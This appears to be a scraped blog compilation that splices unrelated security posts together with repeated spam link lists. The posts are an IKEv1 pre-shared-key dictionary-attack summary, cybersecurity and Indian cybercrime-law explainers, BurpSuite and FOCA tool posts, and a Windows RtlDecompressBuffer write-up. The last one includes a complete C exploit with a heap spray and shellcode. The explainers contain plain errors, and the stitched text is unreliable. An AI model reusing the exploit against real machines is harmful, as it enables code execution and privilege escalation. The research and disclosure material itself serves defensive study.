Practical Dictionary Attack On IPsec IKE

We found out that in contrast to public knowledge, the Pre-Shared Key (PSK) authentication method in main mode of IKEv1 is susceptible to offline dictionary attacks. This requires only a single active Man-in-the-Middle attack. Thus, if low entropy passwords are used as PSKs, this can easily be broken.

This week at the USENIX Security conference, Dennis Felsch will present our research paper on IPsec attacks: The Dangers of Key Reuse: Practical Attacks on IPsec IKE. [alternative link to the paper]

In his blog post, Dennis showed how to attack the public key encryption based authentication methods of IKEv1 (PKE & RPKE) and how to use this attack against IKEv2 signature based authentication method. In this blog post, I will focus on another interesting finding regarding IKEv1 and the Pre-Shared Key authentication.

IPsec and Internet Key Exchange (IKE)

IPsec enables cryptographic protection of IP packets. It is commonly used to build VPNs (Virtual Private Networks). For key establishment, the IKE protocol is used. IKE exists in two versions, each with different modes, different phases, several authentication methods, and configuration options. Therefore, IKE is one of the most complex cryptographic protocols in use.

In version 1 of IKE (IKEv1), four authentication methods are available for Phase 1, in which initial authenticated keying material is established: Two public key encryption based methods, one signature based method, and a PSK (Pre-Shared Key) based method.

The relationship between IKEv1 Phase 1, Phase 2, and IPsec ESP. Multiple simultaneous Phase 2 connections can be established from a single Phase 1 connection. Grey parts are encrypted, either with IKE derived keys (light grey) or with IPsec keys (dark grey). The numbers at the curly brackets denote the number of messages to be exchanged in the protocol.

Pre-Shared Key authentication

As shown above, Pre-Shared Key authentication is one of three authentication methods in IKEv1. The authentication is based on the knowledge of a shared secret string. In reality, this is probably some sort of password.

The IKEv1 handshake for PSK authentication looks like the following (simplified version):

In the first two messages, the session identifier (inside HDR) and the cryptographic algorithms (proposals) are selected by initiator and responder. 

In messages 3 and 4, they exchange ephemeral Diffie-Hellman shares and nonces. After that, they compute a key k by using their shared secret (PSK) in a PRF function (e.g. HMAC-SHA1) and the previously exchanged nonces. This key is used to derive additional keys (k_a, k_d, k_e). The key k_d is used to compute MAC_I over the session identifier and the shared diffie-hellman secret g^xy. Finally, the key k_e is used to encrypt ID_I (e.g. IPv4 address of the peer) and MAC_I. 

Weaknesses of PSK authentication

It is well known that the aggressive mode of authentication in combination with PSK is insecure and vulnerable against off-line dictionary attacks, by simply eavesedropping the packets. For example, in strongSwan it is necessary to set the following configuration flag in order to use it:

charon.i_dont_care_about_security_and_use_aggressive_mode_psk=yes

For the main mode, we found a similar attack when doing some minor additional work. For that, the attacker needs to waits until a peer A (initiator) tries to connect to another peer B (responder). Then, the attacker acts as a man-in-the middle and behaves like the peer B would, but does not forward the packets to B.

From the picture above it should be clear that an attacker who acts as B can compute (g^xy) and receives the necessary public values session ID, n_I, n_R. However, the attacker does not know the PSK. In order to mount a dictionary attack against this value, he uses the nonces, and computes a candidate for k for every entry in the dictionary. It is necessary to make a key derivation for every k with the values of the session identifiers and shared Diffie-Hellmann secret the possible keys k_a, k_d and k_e. Then, the attacker uses k_e in order to decrypt the encrypted part of message 5. Due to ID_I often being an IP address plus some additional data of the initiator, the attacker can easily determine if the correct PSK has been found.

Who is affected?

This weakness exists in the IKEv1 standard (RFC 2409). Every software or hardware that is compliant to this standard is affected. Therefore, we encourage all vendors, companies, and developers to at least ensure that high-entropy Pre-Shared Keys are used in IKEv1 configurations.

In order to verify the attack, we tested the attack against strongSWAN 5.5.1.

Proof-of-Concept

We have implemented a PoC that runs a dictionary attack against a network capture (pcapng) of a IKEv1 main mode session. As input, it also requires the Diffie-Hellmann secret as described above. You can find the source code at github. We only tested the attack against strongSWAN 5.5.1. If you want to use the PoC against another implementation or session, you have to adjust the idHex value in main.py.

Responsible Disclosure

We reported our findings to the international CERT at July 6th, 2018. We were informed that they contacted over 250 parties about the weakness. The CVE ID for it is CVE-2018-5389 [cert entry].

Credits

On August 10th, 2018, we learned that this attack against IKEv1 main mode with PSKs was previously described by David McGrew in his blog post Great Cipher, But Where Did You Get That Key?. We would like to point out that neither we nor the USENIX reviewers nor the CERT were obviously aware of this.
On August 14th 2018, Graham Bartlett (Cisco) email us that he presented the weakness of PSK in IKEv2 in several public presentations and in his book.
On August 15th 2018, we were informed by Tamir Zegman that John Pliam described the attack on his web page in 1999.

FAQs

• Do you have a name, logo, any merchandising for the attack?
  No.
• Have I been attacked?
  We mentioned above that such an attack would require an active man-in-the-middle attack. In the logs this could look like a failed connection attempt or a session timed out. But this is a rather weak indication and no evidence for an attack. 
• What should I do?
  If you do not have the option to switch to authentication with digital signatures, choose a Pre-Shared Key that resists dictionary attacks. If you want to achieve e.g. 128 bits of security, configure a PSK with at least 19 random ASCII characters. And do not use something that can be found in public databases.
• Am I safe if I use PSKs with IKEv2?
  No, interestingly the standard also mentions that IKEv2 does not prevent against off-line dictionary attacks.
• Where can I learn more?
  You can read the paper. [alternative link to the paper]
• What else does the paper contain?
  The paper contains a lot more details than this blogpost. It explains all authentication methods of IKEv1 and it gives message flow diagrams of the protocol. There, we describe a variant of the attack that uses the Bleichenbacher oracles to forge signatures to target IKEv2. 

Related posts

1. Easy Hack Tools
2. Hacking Tools For Beginners
3. Hacking Tools
4. Pentest Tools Bluekeep
5. Hacking Tools For Pc
6. Hacking Tools Windows 10
7. Easy Hack Tools
8. Nsa Hack Tools
9. Pentest Tools Apk
10. Pentest Tools Url Fuzzer
11. Pentest Tools For Ubuntu
12. Pentest Automation Tools
13. Android Hack Tools Github
14. Hacking Tools Mac
15. Install Pentest Tools Ubuntu

Files Download Information

After 7 years of Contagio existence, Google Safe Browsing services notified Mediafire (hoster of Contagio and Contagiominidump files) that "harmful" content is hosted on my Mediafire account.

It is harmful only if you harm your own pc and but not suitable for distribution or infecting unsuspecting users but I have not been able to resolve this with Google and Mediafire.

Mediafire suspended public access to Contagio account.

The file hosting will be moved.

If you need any files now, email me the posted Mediafire links (address in profile) and I will pull out the files and share via other methods.

P.S. I have not been able to resolve "yet" because it just happened today, not because they refuse to help.  I don't want to affect Mediafire safety reputation and most likely will have to move out this time.

The main challenge is not to find hosting, it is not difficult and I can pay for it, but the effort move all files and fix the existing links on the Blogpost, and there are many. I planned to move out long time ago but did not have time for it. If anyone can suggest how to change all Blogspot links in bulk, I will be happy.


P.P.S. Feb. 24 - The files will be moved to a Dropbox Business account and shared from there (Dropbox team confirmed they can host it )  

The transition will take some time, so email me links to what you need. 

Thank you all
M

Related posts

• Pentest Tools Website Vulnerability
• Hack Tools Mac
• Hacking Tools Windows
• Pentest Tools Subdomain
• Hacking Tools Hardware
• Hack And Tools
• Hacker Tools Software
• Growth Hacker Tools
• Physical Pentest Tools
• Bluetooth Hacking Tools Kali
• Pentest Tools Subdomain
• Pentest Tools Website
• Pentest Tools Bluekeep
• Hacking Tools 2019
• Hack Tools Online
• Pentest Tools Subdomain
• Hack Tools For Pc
• Hacker Tool Kit
• Hacking Tools Pc
• Github Hacking Tools
• New Hacker Tools
• Hacking Tools Kit
• Hacking Tools Windows 10
• Pentest Tools Free

What Is Cybersecurity And Thier types?Which Skills Required To Become A Top Cybersecurity Expert ?

What is cyber security in hacking?

The term cyber security  refers to the technologies  and processes designed  to  defend computer system, software, networks & user data from unauthorized access, also from threats distributed through the internet by cybercriminals,terrorist groups of hacker.

Main types of cybersecurity are

Critical infrastructure security

Application security

Network Security 

Cloud Security 

Internet of things security.

These are the main types of cybersecurity used by cybersecurity expert to any organisation for safe and protect thier data from hack by a hacker.

Top Skills Required to become Cybersecurity Expert-

Problem Solving Skills

Communication Skill

Technical Strength & Aptitude

Desire to learn

Attention to Detail 

Knowledge of security across various platforms

Knowledge of Hacking

Fundamental Computer Forensic Skill.

These skills are essential for become a cybersecurity expert. 

Cyber cell and IT cell these are the department  in our india which provide cybersecurity and looks into the matters related to cyber crimes to stop the crime because in this digitilization world cyber crime increasing day by day so our government of india also takes the immediate action to prevent the cybercrimes with the help of these departments and also arrest the victim and file a complain against him/her with the help of cyberlaw in our constitution.

More information

• Pentest Tools Open Source
• Hacker Tool Kit
• Hacking Tools Usb
• Hacking Tools Mac
• Free Pentest Tools For Windows
• Hacking Tools Online
• Hacker Tools For Ios
• Hacking Tools 2019
• Game Hacking
• Github Hacking Tools
• Hacker Tools Software
• Hack Tools For Ubuntu
• Black Hat Hacker Tools
• New Hack Tools
• Pentest Tools Open Source
• Pentest Tools Framework
• Hacking Tools 2019
• Pentest Tools Bluekeep
• Pentest Tools Url Fuzzer
• Hacker Tools For Ios
• Wifi Hacker Tools For Windows
• Pentest Tools Download
• Pentest Tools Review

BurpSuite Introduction & Installation

What is BurpSuite?
Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information.

In its simplest form, Burp Suite can be classified as an Interception Proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) Man In The Middle by capturing and analyzing each request to and from the target web application so that they can be analyzed.

Everyone has their favorite security tools, but when it comes to mobile and web applications I've always found myself looking BurpSuite . It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I'm just going to go through the installation to paint a good picture of how to get it up quickly.

BurpSuite is freely available with everything you need to get started and when you're ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I'll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we'll get into that a little later.

Requirements and assumptions:

Mozilla Firefox 3.1 or Later Knowledge of Firefox Add-ons and installation The Java Runtime Environment installed

Download BurpSuite from http://portswigger.net/burp/download.htmland make a note of where you save it.

on for Firefox from   https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/


If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait.


Video for setup and installation.

You need to install compatible version of java , So that you can run BurpSuite.

More information

1. Tools For Hacker
2. Hacking App
3. Termux Hacking Tools 2019
4. Pentest Tools Download
5. Hacking Tools Hardware
6. How To Make Hacking Tools
7. Hacker Tools Software
8. Hacker Tools Linux
9. Hacker Tools Apk
10. Hacking Tools For Pc
11. Termux Hacking Tools 2019
12. Hacking Tools Online
13. Hack Tools 2019
14. Hacker Tools Hardware
15. Hack Tools
16. Pentest Tools Apk
17. Hacking Tools Online
18. Pentest Tools Github
19. Hack Tool Apk
20. Top Pentest Tools
21. Best Hacking Tools 2020
22. Pentest Tools Port Scanner
23. Hacker Tools Linux
24. Pentest Tools Port Scanner
25. Pentest Tools Android
26. Beginner Hacker Tools
27. Hacker
28. Hacks And Tools

What Is Cybercrime? What Are The Types Of Cybercrime? What Is Cyberlaw In India?

What is cyber crime?

Cybercrime is the use of computers & networks to perform illegal activities such as spreading viruses,online  bullying,performing unauthorized electronic fund transfers etc. Most cyber crimes are committed through the internet.
Some cyber crime also be carried out using mobile phones via Sms and online chatting applications.

TYPES OF CYBERCRIME

The following list presents the common types of cybercrimes-

1-Computer Fraud-Intential deception for personal gain via the use of computer system.

2-Privacy Violations-Exposing personal information such as email addresses,phone numbers,account details etc, on social media,websites,etc.

3-Identity theft-Stealing personal information from somebody and impersonating that person.

4-Sharing copyright files/information-This involves distributing copyright protected files such as eBooks and computer program etc.

5-Electronic funds transfer-This involves gaining an unauthorized access to bank computer networks and making illegal funds transferring.

6-Electronic money laundering-This involves the use of the computer to launder money.

7-Atm fraud-This involves intercepting ATM card details such as account numbers and PIN numbers.These details are then used to withdraw funds from the intercepted accounts.

8-Denial of service attack-This involves the use of computers in multiple locations to attack servers with a view of shutting them down.

9-Spam:sending unauthorized emails.

These emails usually contain advertisements.

CYBER LAW

Under The Information Technology Act,2000 

CHAPTER XI-OFFENCES-66. Hacking with computer system.

1-whoever with the Intent to cause or knowing that he is likely to cause Wrongfull Loss or Damage to the public or any person Destroys or Deletes or Alter any Information Residing in computer Resource or diminishes its value or utility or affects it injuriously by any means, commits hack.

2-whoever commits hacking shell be punished with imprisonment up to three years, or  with fine which may extend up to two lakh rupees,or with both.

More articles

1. Pentest Tools Alternative
2. Hack Tools For Mac
3. Hack Tools Pc
4. Hak5 Tools
5. Pentest Box Tools Download
6. Pentest Tools Alternative
7. Underground Hacker Sites
8. Hacker Tools Mac
9. Github Hacking Tools
10. Tools 4 Hack
11. How To Install Pentest Tools In Ubuntu
12. Hacking Tools For Games
13. Hacking Tools For Games
14. Nsa Hacker Tools
15. How To Make Hacking Tools
16. Pentest Tools Alternative
17. Tools For Hacker
18. Pentest Tools For Ubuntu

FOCA V3.4.7 Released! #FearTheFOCA What's New? @Fear_The_Foca

La nueva versión de FOCA ya está en la calle lista para que empieces a jugar con ella. Como ya habíamos anunciado mi compañero Fran Ramírez y yo en nuestro CodeTalk de novedades de FOCA, se acaba de publicar la nueva versión, la FOCA v3.4.7 con las características ya anunciadas., y alguna más.

Figura 1: FOCA v3.4.7 Released! What's new?

Por si aún no has visto el CodeTalk For Developer que hicimos Fran Ramírez y yo sobre las novedades de FOCA, lo tienes aquí mismo para que te lo veas estos días si tienes un ratito.


Figura 2: CodeTalk For Developers: Novedades de FOCA

En él estuvimos hablando, además de todas las novedades en que estábamos trabajando, de esta nueva versión 3.4.7. que ya puedes descargar de la sección de Releases de nuestro GitHub de FOCA. Aquí mismo te la dejamos listo para que la descargues.

Figura 3: Release FOCA v3.4.7 en GitHub, compilada y con  código fuente

En el artículo de hoy vamos a aprovechar y hacer un repaso de todas estas nuevas funciones que hemos añadido en esta nueva versión donde, como característica principal, se ha incluido DIARIO para el análisis de malware de los documentos, apoyándose en tecnología Machine Learning. Como habréis visto, nuestros compañeros llevan tiempo usando Machine Learning aplicado a ciberseguridad y hemos metido una de las funciones desarrolladas en nuestra querida FOCA.

Figura 4: Machine Learning Aplicado a Ciberseguridad
de  0xWord con Carmen Torrano, Paloma Recuero, Fran Ramírez,
José Torres y Santiago Hernández

Podéis ver más detalles de su funcionamhttps://github.com/ElevenPaths/FOCAiento desde la propia web de DIARIO. Para acometer estos cambios y realizar una integración a medida, hemos considerado pertinentes una serie de modificaciones que facilitan su uso, que extienden la funcionalidad de FOCA, que sigue siendo básicamente como se explica en el libro que escribimos junto con Chema Alonso de Pentesting con FOCA 2ª Edición.

Figura 5:Libro de  Pentesting con FOCA 2ª Edición en 0xWord
de Chema Alonso con colaboración de Ioseba Palop, Manu Fernández,
Pablo González, Enrique Rando, Rubén Alonso y Juanma Moreno

La primera de ellas es la actualización del árbol lateral, creando la entrada 'Document Analysis'. Eso se debe a que no solo se pueden analizar metadatos de documentos como siempre, sino que también se podrá además comprobar diferentes sistemas de detección de malware en ellos. De esta manera, se le da un concepto más amplio para cualquier futura implementación que se quiera realizar.

Figura 6: Document Analysis

También se puede apreciar que al igual que existía un 'Metadata Summary', se ha incluido un resumen de los ficheros analizados por DIARIO, catalogando aquellos documentos en los que se ha encontrado malware, y en los que no.

Figura 7: Malware Summary

Y ahora, la vista de detalle de un documento no solo incluye la información de metadatos encontrados, sino que incluye también la predicción de malware. Ambos tipos de información siempre y cuando se hayan analizado, ya que este análisis se realiza de manera independiente. Como se puede apreciar en la imagen, aparecerá una advertencia en el caso de que el análisis de metadatos y/o de malware esté pendiente.

Figura 8: Información detallada de un documento

¿Cómo se realiza el análisis de malware de uno o varios documentos? De la misma manera en la que se analizan los metadatos. Basta con ir al listado de ficheros añadidos, y utilizando el menú contextual, pulsar la opción de 'Analyze Malware' para analizar el fichero o ficheros seleccionados, o 'Analyze All Malware' para analizar todos los del listado.

Figura 9: Analizando malware con DIARIO en todos los documentos

Cabe destacar que no todos los ficheros pueden ser analizados. Para esto deben estar descargados previamente, no haber sido analizados y que tengan una extensión compatible con DIARIO. Estas extensiones son 'pdf', 'docx', 'xlsx', 'doc', y 'xls'. En este vídeo tenéis información más detallada de DIARIO.

Figura 10: DIARIO. Una nueva forma de analizar malware.

Pero estas no son las únicas novedades. Además de los ya habituales fixes de versiones anteriores y la mejora y limpieza de código, esta nueva versión incluye mejoras en la extracción de metadatos, como el análisis de imágenes embebidas en ficheros PDF.

Figura 11: Extracción de metadatos en imágenes embebidas en ficheros PDF

¡Aprovechad estos días de estar en casa y probad la nueva funcionalidad! Si son tus primeros pasos con FOCA, aquí puedes consultar una pequeña guía. Y recuerda que puedes seguir al día las novedades en nuestra Cuenta de Twitter Oficial de FOCA: @Fear_The_Foca

Fear the FOCA!

Autor: Ioseba Palop, Main FOCA Contributor.

Figura 12: Contactar con Ioseba Palop

Sigue Un informático en el lado del mal RSS 0xWord

This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

More info

1. Pentest Tools Framework
2. Hacking Tools And Software
3. Pentest Tools Website Vulnerability
4. Hacking Apps
5. Top Pentest Tools
6. Hack Tools For Games
7. Hacking Tools For Kali Linux
8. Hacking Tools Usb
9. Bluetooth Hacking Tools Kali
10. Hacker Tools 2019
11. Pentest Recon Tools
12. Install Pentest Tools Ubuntu
13. Hacker Tools 2020
14. Pentest Tools Port Scanner
15. Pentest Reporting Tools
16. Pentest Tools Linux
17. Blackhat Hacker Tools
18. Hack Tools

OpenVAS

"OpenVAS stands for Open Vulnerability Assessment System and is a network security scanner with associated tools like a graphical user front-end. The core is a server component with a set of network vulnerability tests (NVTs) to detect security problems in remote systems and applications." read more...

Website: http://www.openvas.org

Related articles

• Beginner Hacker Tools
• Nsa Hack Tools
• Pentest Tools Apk
• Top Pentest Tools
• Hack Tools Download
• Pentest Tools Free
• Computer Hacker
• Hack Apps
• Hack Tools Mac
• Hack Website Online Tool
• Pentest Automation Tools
• Hacker Tools Apk
• Hacker Tools Windows
• Pentest Tools Open Source
• Hackrf Tools
• Usb Pentest Tools
• Hacking Apps
• Hacking Apps
• Hacking Tools Pc
• Pentest Tools Framework

RtlDecompresBuffer Vulnerability

Introduction

The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1.

The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps.

The algorithms callback table







Notice the five nops at the end probably for adding new algorithms in the future.

The way to jump to this pointers depending on the algorithm number is:
call RtlDecompressBufferProcs[eax*4]

The bounrady checks

We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks:

int  RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6)
{
  int result; // eax@4

  if ( algorithm & algorithm != 1 )
  {
    if ( algorithm & 0xF0 )
      result = -1073741217;
    else
      result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);
  }
  else
  {
    result = -1073741811;
  }
  return result;
}

Regarding that decompilation seems that we can only select algorithm number from 2 to 15, regarding that  the algorithm 9 is allowed and will jump to 0x90909090, but we can't control that addess.

let's check the disassembly on Win7 32bits:

• the movzx limits the boundaries to 16bits
• the test ax, ax avoids the algorithm 0
• the cmp ax, 1 avoids the algorithm 1
• the test al, 0F0h limits the boundary .. wait .. al?

Let's calc the max two bytes number that bypass the test al, F0h

unsigned int max(void) {
        __asm__("xorl %eax, %eax");
        __asm__("movb $0xff, %ah");
        __asm__("movb $0xf0, %al");
}

int main(void) {
        printf("max: %u\n", max());
}

The value is 65520, but the fact is that is simpler than that, what happens if we put the algorithm number 9? 

So if we control the algorithm number we can redirect the execution flow to 0x55ff8890 which can be mapped via spraying.

Proof of concept

This exploit code, tells to the RtlDecompresBuffer to redirect the execution flow to the address 0x55ff8890 where is a map with the shellcode. To reach this address the heap is sprayed creating one Mb chunks to reach this address.

The result on WinXP:

The result on Win7 32bits:

And the exploit code:

/*
    ntdll!RtlDecompressBuffer() vtable exploit + heap spray
    by @sha0coder

*/

#include 
#include 
#include 

#define KB  1024
#define MB  1024*KB
#define BLK_SZ 4096
#define ALLOC 200
#define MAGIC_DECOMPRESSION_AGORITHM 9

// WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php
/*
unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93"
"\xBF\x77\xFF\xD2\xCC"
"\xE8\xF3\xFF\xFF\xFF"
"\x63\x61\x6C\x63";
*/

// https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
char *shellcode =
       "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
       "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
       "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
       "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
       "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
       "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
       "\x45\x81\x3e\x43\x72\x65\x61\x75"
       "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
       "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
       "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
       "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
       "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
       "\x6c\x63\x89\xe2\x52\x52\x53\x53"
       "\x53\x53\x53\x53\x52\x53\xff\xd7";


PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits

void fail(const char *msg) {
  printf("%s\n\n", msg);
  exit(1);
}

PUCHAR spray(HANDLE heap) {
  PUCHAR map = 0;

  printf("Spraying ...\n");
  printf("Aproximating to %p\n", landing_ptr);

  while (map < landing_ptr-1*MB) {
    map = HeapAlloc(heap, 0, 1*MB);
  }

  //map = HeapAlloc(heap, 0, 1*MB);

  printf("Aproximated to [%x - %x]\n", map, map+1*MB);


  printf("Landing adddr: %x\n", landing_ptr);
  printf("Offset of landing adddr: %d\n", landing_ptr-map);

  return map;
}

void landing_sigtrap(int num_of_traps) {
  memset(landing_ptr, 0xcc, num_of_traps);
}

void copy_shellcode(void) {
  memcpy(landing_ptr, shellcode, strlen(shellcode));

}

int main(int argc, char **argv) {
  FARPROC RtlDecompressBuffer;
  NTSTATUS ntStat;
  HANDLE heap;
  PUCHAR compressed, uncompressed;
  ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;

  RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");

  heap = GetProcessHeap();

  compressed_sz = estimated_uncompressed_sz = 1*KB;

  compressed = HeapAlloc(heap, 0, compressed_sz);

  uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);


  spray(heap);
  copy_shellcode();
  //landing_sigtrap(1*KB);
  printf("Landing ...\n");

  ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);

  switch(ntStat) {
    case STATUS_SUCCESS:
      printf("decompression Ok!\n");
      break;

    case STATUS_INVALID_PARAMETER:
      printf("bad compression parameter\n");
      break;


    case STATUS_UNSUPPORTED_COMPRESSION:
      printf("unsuported compression\n");
      break;

    case STATUS_BAD_COMPRESSION_BUFFER:
      printf("Need more uncompressed buffer\n");
      break;

    default:
      printf("weird decompression state\n");
      break;
  }

  printf("end.\n");
}

The attack vector

This API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7

Related word

1. Hack Tool Apk
2. Hacker Tools Windows
3. Hacking Tools 2020
4. Hacking Tools And Software
5. Hacker Tools Software
6. Hacking Tools Software
7. Pentest Tools Linux
8. Nsa Hacker Tools
9. Pentest Reporting Tools
10. Kik Hack Tools
11. Android Hack Tools Github
12. Hack Tools For Games
13. How To Make Hacking Tools
14. Tools For Hacker
15. Pentest Tools Review